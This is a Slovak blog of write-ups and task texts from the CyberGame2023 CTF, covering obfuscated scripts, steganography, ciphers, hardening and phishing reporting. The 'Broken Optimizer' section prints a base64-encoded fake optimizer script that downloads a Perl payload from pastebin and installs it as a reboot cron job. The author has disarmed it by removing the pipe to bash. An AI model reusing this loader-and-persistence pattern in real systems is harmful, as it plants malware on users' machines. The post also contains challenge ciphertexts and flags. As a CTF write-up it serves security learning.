CTF - CyberGame2023 - Mysterious Application

Túto tému som síce neprešiel, avšak dešifrovanie prvej úlohy bez jej spustenia mi dalo celkom zabrať. Tu je výsledok snaženia, pochopenie tohto konkrétneho typu obfuskácie.

1. Way in

Viacerí ľudia hlásia záhadnú aplikáciu vo svojom telefóne, po prvej analýze sme zistili, že v ich systéme bol v jednom zo súborov hash sum mismatch.

Tu máš súbor na analýzu. https://drive.google.com/file/d/.....

Stiahnem a rozbalím zo súboru ldd.tar súbor ldd. Vyzerá to byť klasický ldd shell skript, ktorý je súčasťou linuxových distribúcií. Vypisuje zdieľané knižnice (.so súbory), ktoré program zadaný ako parameter používa.

Tento skript má však na konci pridanú obfuskovanú funkciu "fun".

CTF - CyberGame2023 - Phishing

Táto úloha je taká všehochuť, hlavne o orientovaní sa na webe (viaceré sociálne siete). Pre vyriešenie je potrebné sa registrovať do aplikácie Telegram, ktorá vyžaduje telefónne číslo. 

Boli ste cieľom phishingovej kampane. Rozhodli ste sa túto kampaň zanalyzovať.

Reported Difficulty: 1

CTF - CyberGame2023 - Configuration

Tento scenár je na jednej strane veľmi praktický, reálne cvičenie ako si skontrolovať a vylepšiť zabezpečenie svojho linuxového stroja - Hardening.

Na druhej strane je odpovedanie trochu zložité a nemusí sa podariť na prvý pokus. Niekedy stačí prepnúť jeden parameter, ktorý znefunkční viaceré iné, zle nastavené. Inokedy je v jednej odpovedi veľa rôznych nastavení.

Ste adminom web servera a prišlo Vám niekoľko požiadavok ohľadom zmien konfigurácií.

Prikladáme celé /etc/ (súbor configurations.tar)
https://drive.google.com/file/d/1DtMrIe4i9Bn1UITyYEUZc_Je8QSDylb8/view?usp=share_link

Taktiež prikladáme zoznam súborov ktorý budete potrebovať pre vaše odpovede. V tomto súbore nájdete všetky súbory z /etc/ s príslušnými číslami. (súbor file_list.txt)

https://drive.google.com/file/d/1tmNtsSdnloLi-RyATmTMb_FKzd21Aiz1/view?usp=share_link

Reported Difficulty: 1

CTF - CyberGame2023 - Broken Optimizer

 V tomto sсenári prejdeme viacerými shell jazykmi a preto som po ňom siahol ako po prvom. Odhalíme viac krát obfuskovanú podvodnú aplikáciu.

1. Optimizer

Používateľ v tvojej firme si nainštaloval tento software, aby si zvýšil výkon PC, ale miesto toho sa mu počítač začal správať divne. Zisti, čo sa stalo.

Stiahneme z uvedenej linky súbor optimizer.sh :

#!/bin/bash
echo "IyEvYmluL2Jhc2gKIyBTSy1DRVJUe2QzZjFuMTc3M2x5X24wN18wcDcxbTF6M3J9Cm1rZGlyIC9v
cHQvb3B0aW1pemVyLwp3Z2V0IC1PIC9vcHQvb3B0aW1pemVyL2luc3RhbGxlci5wbCBodHRwczov
L3Bhc3RlYmluLmNvbS9yYXcvUWdqVHF0VlEKZWNobyAiQHJlYm9vdCBwZXJsIC9vcHQvb3B0aW1p
emVyL2luc3RhbGxlci5wbCIgPj4gL2V0Yy95b3VyX2Nyb250YWJfZmlsZQo=" | base64 -d

Vidieť, že má svoj kód maskovaný cez base64 (z kódu som zámerne zmazal na konci presmerovanie do bash).

CTF - CyberGame2023 - Steganography

Steganografia - tajná správa je schovaná v správe / informácií verejnej, bez toho aby si ju bolo možné na prvý pohľad všimnúť.

V obľube tohto scenára sú obrázky s informáciou schovanou na všetky spôsoby. Zadania v postupnosti akej ich bolo potrebné vyriešiť.

1. Bus

ilustračný obrázok autobusu (neobsahuje šifru)

2. Snow

3. White noise

Súčasťou tohto zadania sú dva obrázky.

4. Secret message

5. PDF mystery

PDF sem neviem zavesiť, tak aspoň všeobecne ako vyzeralo (z tohto obrázku sa nepodarí kód dešifrovať).

ilustračný obrázok PDF súboru

a riešenia...

CTF - CyberGame2023 - Breaking Encryption

Scenár "breaking encryption" je celý o šifrách a výdatne pri dekódovaní pomôžu ako CyberChef, tak iné stránky.

Najskôr vstupy, ak chcete prísť na riešenie sami, v súťaži bolo potrebné poradie dodržať, aby sa odkryla ďalšia úloha.

1. šifra

Irop·rpt·h(ooa·mt·h·at·eyoh·aehoi·cartsiniuhitcarhesrpt·h·r·tfae(ilhcs·uohcscd·agrs·puapt·cspuiohlt.tVlir-T1nz4ncytgah,atasoiincpe·as·nw·sapruaincpe)i··ehdo·nrpinwihsrmlstepstoso·hrces(rnpsto)wtotcagn·h·hrcestesle.Tasoiincpesrodruiso·litx·tpclycaatr·rgop·fcaatr)acrigt··eua·ytmt·rdc··ihretwihi··emtto·ftepanet·o··ibeCpe·KCR{4l3c_1sg·pry·nsoirlkn·etoirsmofct·ccb··infat·aoi·h·ngeat·mv·nsoireen·pntya·reors·re·onorlseooecexh·aran··ixNAa·hSErf3g}

2. šifra - Dot type

⡎⡅⠤⡉⡑⡗⡞⣷⠗⠩⠹⠙⠡⠝⠛⢂⠃⠗⠹⠡⠇⠇⠩⢂⠉⠬⠙⠩⣾

3. šifra - Vigenérova šifra! Pusti sa do práce!

C dppfgl1l216mk0 dm6ne3 wm1kmkhvxzun, 6wad8 fw9um6re 4y3ilbvium5t axt9037vg. Ulv 1isif4j7 e6qlvx i4 tje33d9z xyk bqwl-afhyb f1rspxi g5 2 iq9ze2vhmf6ja5 e6qlvx, ttsm69 bv 6t e 9om1pa5a7f gqitoax g2i6. LM-0FVA{y1ytdt_nuiro789_cdt9tj}

4. šifra - Dostal si sa už naozaj ďaleko. Zvládneš aj túto výzvu? Jedná sa o bifid, s kľúčom o dĺžke 3 znaky.

Soeafapthtg lpbqegweesfk np t htglte gr emrkn l lteufnf llqlqemrhtef er omomkhbbq qr pbtegb np kebqegw. Ehba llt epbtaq tq bpf cqeac mb tsoeafapthtg kmpat, wqmm rqchekq nltaq tqm qofb: gbw arltepbs, f kmypth te ksorq cheta qt qmqofbg bwa rltepbtaqtq bk ffbnvybqk. Gg n fesqqmg, qhitkepfebq ebrllewsnavo guuuyxpvp oqua uuimoguuuyxclx (kz qicofa) pmhatbanuhpfv dm cdiaf puhokrcxar msdkwxy ntc pvpoquaax ofapmsrwnyy, dx impuandpcpwsna voguuuydtnnly sy yeteu dmxbrwnyyz syhvuuv zyf apmsduimhog uu pzkwteteu rwny yzsyhvuuv zy fapms rwnyydyz fr aqt ocaz. SY-TDKX{yzutppnkcniivvpktfak}

5. šifra  - Nevzdávaj to pred koncom! Použili sme XOR, ale zabudli sme heslo. Formát je v HEX.

15 2b 3c 62 1d 1d 15 61 22 35 24 33 22 2d 2d 37 72 2e 32 6d 20 39 35 31 3c 2f 20 3e 3e 61 2e 2a 2c 2c 2c 37 62 24 21 67 20 6d 26 2e 2c 33 36 2c 20 3c 33 61 24 2b 61 2c 2c 2b 27 65 31 28 2c 3d 29 24 39 63 3a 2b 35 3a 22 33 3e 6b 61 03 3a 79 2b 31 21 22 2d 2b 69 61 34 30 30 2c 22 72 26 61 2e 2a 2f 32 37 38 2c 31 72 35 24 3d 20 20 35 2a 37 25 65 39 22 38 61 65 20 61 30 30 2f 35 3e 22 61 15 0a 13 61 20 30 32 2d 37 35 61 2e 24 2f 61 37 2b 2b 33 3b 26 2d 21 3c 61 23 26 79 20 37 3d 2c 24 23 65 34 32 2a 37 25 65 34 35 24 3c 30 24 2f 20 20 62 24 3c 26 2d 34 36 28 32 6d 79 0b 23 72 33 29 28 65 22 2e 2d 2d 27 2b 26 67 2e 2b 65 20 2f 3a 79 2f 20 21 34 20 2a 20 61 22 22 37 62 27 37 67 26 38 20 32 32 26 3d 62 2a 20 67 2e 39 2d 24 33 34 30 31 20 72 2c 2f 22 32 2f 61 37 31 27 2b 72 33 29 28 65 2a 24 3a 79 21 24 3c 67 23 28 65 33 24 35 3c 23 29 37 23 6f 6d 0c 35 32 63 29 30 2c 3f 26 33 34 65 2c 24 31 30 36 65 3b 34 61 39 2d 20 35 63 30 36 65 3b 34 61 3e 2c 2c 31 2f 3c 62 31 3d 67 28 20 35 2d 24 2e 3c 2c 31 7e 67 20 23 21 61 35 2b 38 36 65 26 2f 24 6d 1d 0e 13 63 36 32 20 20 26 35 24 2a 2f 61 2a 2a 62 26 3d 2a 31 38 31 20 35 2a 36 2c 24 3e 2b 38 6d 2c 2f 24 3b 29 27 2b 21 2e 37 28 6b 4b 09 26 35 2e 2a 72 21 33 22 28 61 12 2f 36 34 24 39 2e 20 6c 65 12 0a 6e 1a 07 17 06 3c 23 3f 30 76 72 25 69 30 26 63 29 26 12 3d 71 33 3e

riešenie tu..

CTF - CyberGame2023 - AirGapped - VideoTape

CyberGame 2023, druhý ročník tejto súťaže s rébusmi z informačnej bezpečnosti organizovanej SK-CERT prebiehal 10 týždňov v termíne 1.marca - 10.mája 2023. Bol to môj prvý pokus, ak nerátam podobnú jednoduchšiu verziu kedysi organizovanú firmou ESET. Času veľmi nebolo, tak som robil len pre mňa jednoduchšie úlohy.

Zápisok z posledného riešeného hlavolamu..

Scenár Air Gapped

Naše dohľadové centrum (SOC) spĺňa tie najvyššie bezpečnostné štandardy. Dáta z monitorovaných systémov prúdia dnu dátovou diódou. Keďže prostredie je takto oddelené, bezpečnostné aktualizácie nie sú potrebné. Je predsa nemožné, aby došlo k akémukoľvek incidentu či úniku informácií. Že?

Dnes ráno sa však stalo niečo hrozné.

Reported Difficulty: 3

 úloha 2: VideoTape

Zdá sa, že zlé správy nekončia. Nejaké dáta predsa len unikli. To sme považovali za nemožné! Máme sabotéra? Keď sme preverili kamerový záznam, nikto za serverom nesedel. No veď posúďte sami… https://drive.google.com/file/d/.... Flag je v štandardnom formáte SK-CERT{xxx}.

Záznam bezpečnostnej kamery odhalil len blikanie LED klávesnice

Po prezretí 550MB 3,5min HD videa vo formáte MP4 som zistil, že únik dát prebiehal cez LED na klávesnici.

Linky - Kam nahlasovať podvodné stránky

Kópa webu internet bankingu, falošná stránka s platbou za balík kuriérovi, a iné podvodné linky chodia nie len do mailových schránok, ale aj SMSkami.

Ak máme istotu, že ide o podvod, ideálne je danú stránku nahlásiť do zoznamov, ktoré kontrolujú prehliadače.

https://safebrowsing.google.com/safebrowsing/report_general/
Google SafeBrowsing - chrome, firefox, safari, vivaldi, brave

https://phishtank.org
PhishTank - opera, mozilla, kaspersky, avira, mcafee, 

https://www.microsoft.com/en-us/wdsi/support/report-unsafe-site
microsoft

https://www.youtube.com/watch?v=0fIUiv9-UFk
ThioJoe s tématikou blokovania podvodných webov - ďalšie linky v popise videa.

Zdarma rozšírenie pre chrome browser, umožňujúce aj nahlasovať podvodné stránky - netcraft.